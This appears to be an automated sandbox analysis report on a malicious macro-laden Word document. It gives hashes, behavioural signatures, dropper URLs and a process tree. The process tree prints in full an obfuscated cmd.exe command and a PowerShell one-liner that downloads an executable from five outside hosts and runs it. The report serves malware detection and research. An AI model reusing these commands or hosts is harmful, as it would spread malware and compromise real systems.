Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    20-05-2024 17:03

General

  • Target

    60374b6b6af3002c0ece1e99d1da0be3_JaffaCakes118.doc

  • Size

    196KB

  • MD5

    60374b6b6af3002c0ece1e99d1da0be3

  • SHA1

    084ced349bd9a2134d054dc2d0945109c245044f

  • SHA256

    d89561784bc9cc81bce5a9918801420e466282f164f0a1d891c3ff27226072c6

  • SHA512

    f342643753bdecb25be0c3bfbd46b5440712051ea6c7d9c66ecb1d66f8f3fdd7f7ffd0c8d69354f3dd27181454b3badd9f47e9495b3226eafad9e602787a5de2

  • SSDEEP

    3072:9te2dw99f20PE5iPieV83OqWwRqgLQ+v82YVWuO0SjM5/9hpfixCnQOvJ0zjH7UU:fHdw7t8wieWRqQzxfXUJahNBZhH

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://bnote.novelux.com/qvE6Rp

exe.dropper

http://atmah.org/Em1cXp

exe.dropper

http://tinhhoabattrang.vn/nb

exe.dropper

http://1001tur-tver.ru/wc1Xm

exe.dropper

http://350degrees.org/xUvee47E

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\60374b6b6af3002c0ece1e99d1da0be3_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2888
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2400
      • C:\Windows\SysWOW64\CMd.exe
        CMd /V:/C"^se^t -^@^$=-_\^ _/- ^\-_ /-\ /^-^_ \^-^_^ /\^_^ _/^\^ ^_/^\^ /-^\ /^-^_ /-^_^ -_^\ ^_/^\ ^\/^_ -\^_^ /^-_ ^-\^_}^-^\/}\/^-^{/_\^h\/^-c-_\^t^_-/a/^\_c/^_\^}/_-;-/^_^k\^_^-^a-\/^e/\-r^-_^\b^_/\;^-^_\j/^-^\^j\^_-^a/^_-$^_-\^ ^_^-^\^m\_/^e/_\^t^\/-I-\_-_^-\e^_^\/^k^\_^-^o/_^\v/\^-n-/\^I/_-^;\/^-)^_-/^j^_\/^j-/^_^a^-/\^$/_^\ /\_^,_\/^T^_/-N_/^\V^-\_$_/\(-/_^e_^-/l/\^_^i/^\^_^F^_\-^d_^\/a\/^-o/_^\l_/-n^-^\/w^-_^\^o^_-/D/\^-^._/^\T^\/^_o^\/^-S\-/$^-^_^\^{_/-y^-/^_r_\/^t^-_/{/_\)/-_^i\-/^z/^\^-b/^-\^$-^_/ \^_/n-/_^i/^\-^ /\-T^_^\/N^-_/V_/-$^\/-(^-_/h^\/^-c\/_^a\^_/e/\^-r^\_^-o^_/-^f-^_\;-^\_'^\/-e^\_/x^-^_\^e^-/_^./-^_'/^\^-+/^\-p/_-q-\/j-_^\$\_/^+/\-^'/^\^_\^_\/^'/^-^_^+^-^\^_c/_^-i/_^\l-/^_^b-\/u^\_^-^p^-^\^_^:-^\/v^_/\n^-/^_e/\-^$/_\^=/_-j^_\-j/-^_a_^\^-^$-_/;^-/\^'_^\/7/-^_^7^-\^_1_^\/'^_\/ /\_^=/^-_^ _/^\^p/\^_^q/^\^_^j^\^-^_$\/^_^;/-\)\/^-^'\^_-^@^\_/'-^_\(/^-^_^t^\_^-^i_^-^\l^_/-p^-^_\S/\^_.^-^\_'\-_^E\-/^7_/^-^4-_\e-/^_^e/^_-v/^-_U^_^-^\x\^-^_//\^-^g/^_^\r\/^-o_-/.\/^-^s^_^-^\e^\/_e^\/_r\/-^g\/^_^e/^-^\d/_^\^0-^\_^5-_^\^3^-/^_//-^_//^\-^:-/^\p^-/^\^t-/^_^t\/^-^h\-/^@^-\_m\^_-X-^\_^1/_\c-\_w^\^-_/\_^-^u\/^_r\^-_^.^-/\r^_/^-e-/\v-/\^t^\/^-^--\^_r-/_u^-/^_^t-^_/^1^_^\^-0^-/\0/\^_^1_/\//^_\/^\/^-^:/^-^\^p/_^-^t/^_\^t-_/h^\^_^-^@\^_/^b_^-^\n_\///^\^-n^_/^\v_^-/.^_^-\g/_^\n^\/^_^a_/^\r^_/^-^t\_^-^t-\/^a_/-^b_^-/^a^_-/^o^_^-\h^\/^-^h-^_/n/^_^-^i/^-\^t/_\//\^-/^-^_/^:/_^-^p-/^_^t_^\^-^t^\-/^h^_^\/^@^_^\^-^p-^_\X\^_^-c_^\/1\/-m^_-\E_/^\//_\g/^-^_r^-\/o^_^-/^.\^-^_^h^-/^_^a\/^_^m^\-_^t^-^_/^a\^_//^-^_\/^\^-_:-^_^\p^_^-/t/\^_t^-_^\h/^\-^@/-\p\-_R-_^\^6^\^-/E^\/^_v^_^\-^q-/_/^_/^-^m-_^\o-/^\c^_/^\./-^_x\/^_^u^-\/l^-^\^_^e_/-v^-_\^o^\/^_n/\_.^\^-^_e^-/\t/^\_^o/^-^\n_/\b-^\^_/\/-/^_^-/^:^-\/^p/\^-^t^\-/t^_^-\^h^\^_-^'/^_^\=-/_i^-^\_^z/_^\^b^-/\^$-/^_;-/^_^t^_\/n^-_/e^\/^_^i^\^_^-l/^_\C^_\^-^b_-/^e\/_^W^-^\/.^\-/t-/^_e^_^-/N^\/^_ -/\t-/_c^\_/^e/\-j-\^_^b^-\_^o-\_--\/w/^-_^e^_/^-n^_\^-=^_^-/^T^_/^-^o^_/^-^S\/_$\_^-^ ^\/^_l_^\-^l^\-/e^\^_^-^h\/^_^s\-^_r/^-\^e-/_w\-_o-/^_^p&&^f^or /L %n ^in (^14^1^9^,^-^4^,^3)^d^o ^s^et ^},^#=!^},^#!!-^@^$:~%n,1!&&^i^f %n ^eq^u ^3 c^al^l %^},^#:~-^35^5%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2800
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $SoT=new-object Net.WebClient;$bzi='http://bnote.novelux.com/qvE6Rp@http://atmah.org/Em1cXp@http://tinhhoabattrang.vn/nb@http://1001tur-tver.ru/wc1Xm@http://350degrees.org/xUvee47E'.Split('@');$jqp = '177';$ajj=$env:public+'\'+$jqp+'.exe';foreach($VNT in $bzi){try{$SoT.DownloadFile($VNT, $ajj);Invoke-Item $ajj;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2688

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      4cfc38d8344faf34a0520fc59718e1d1

      SHA1

      056da80d361ae93b36555dcaf433e3b5863c518d

      SHA256

      bc9852cd4b27a9e81d4f7e031dbe0b259cc9e3ba85370d22196ec314a1a3bd51

      SHA512

      d763863bb91f11ee3e4783d3c45032e246640ecbb575a529b17f8e239c88a1dd0d2d8216de0a8323d302f6722e0c9f9e6e970544bb530abf8b9a2df88c05cbb7

    • memory/2888-44-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-6-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-38-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-37-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-9-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-14-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-13-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-12-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-11-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-10-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-47-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-0-0x000000002FCC1000-0x000000002FCC2000-memory.dmp

      Filesize

      4KB

    • memory/2888-79-0x0000000070C8D000-0x0000000070C98000-memory.dmp

      Filesize

      44KB

    • memory/2888-2-0x0000000070C8D000-0x0000000070C98000-memory.dmp

      Filesize

      44KB

    • memory/2888-7-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-32-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-31-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-29-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-20-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-15-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-8-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-62-0x0000000070C8D000-0x0000000070C98000-memory.dmp

      Filesize

      44KB

    • memory/2888-63-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/2888-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2888-78-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2888-45-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB